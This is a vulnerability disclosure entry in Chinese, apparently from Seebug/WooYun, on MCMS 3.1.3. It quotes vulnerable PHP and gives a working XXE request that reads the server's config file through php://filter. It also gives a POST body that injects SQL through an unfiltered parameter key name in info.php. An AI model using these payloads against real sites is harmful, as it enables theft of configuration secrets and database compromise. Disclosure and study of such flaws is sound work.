MCMS 3.1.3 最新版sql注入与任意文件读取

2015-03-20T00:00:00
ID SSV:95217
Type seebug
Reporter Root
Modified 2015-03-20T00:00:00

Description

简要描述:

rt

详细说明:

先看看任意文件读取。 上次提交的这个 WooYun: mcms v3.1.0 sql注入+任意文件读取。 厂商的做法是

``` $wx=new weixin(); $_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST);
........... function response_msg(){ global $dbm,$C; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"];

if(!empty($postStr)){
    $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
    $fromUsername = $postObj->FromUserName;
    $toUsername = $postObj->ToUserName;

... $keyword = trim($postObj->Content); $keyword = H::sqlxss($keyword); ```

$_GET = H::sqlxss($_GET); $_POST = H::sqlxss($_POST); $keyword = H::sqlxss($keyword);加了这么几句。 注入是不行了。 但是 依然可以任意文件读取啊~ post:

POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: text/xml Content-Length: 262 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php"> ]> <xml> <ToUserName>&test;</ToUserName> <Content>a\</Content> </xml>

<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

再来看看注入。 D:/wamp/www/app/user/info.php

function m__save(){ global $dbm,$C,$V; $_POST['info_body']=strip_tags($_POST['info_body'], ' &lt;p&gt;&lt;a&gt;&lt;img&gt;'); $_POST=H::sqlxss($_POST); //处理附件参数 $attach= $oname = $order = $model_fields = array(); foreach($_POST as $k=&gt;$v){ if(substr($k,0,9)=='attach___'){ $attach[$v]=$v; $oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]); $order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]); } if (substr($k,0,9)=='extern___') { // 填充扩展表字段 $model_fields[substr($k,9)] = $v; } } ...... if($fields['model_name']!=''){ $model_fields['info_id']=$info_id; //预先处理某些值 比如日期 foreach($model_fields as $k=&gt;$v) { $sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1";

由于对于键名木有过滤,导致注入的产生, post:

info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1

<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">

可以看到单引号进来了。可延时盲注- -

漏洞证明:

<img src="https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png" alt="11.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png" alt="1.png" width="600" onerror="javascript:errimg(this);">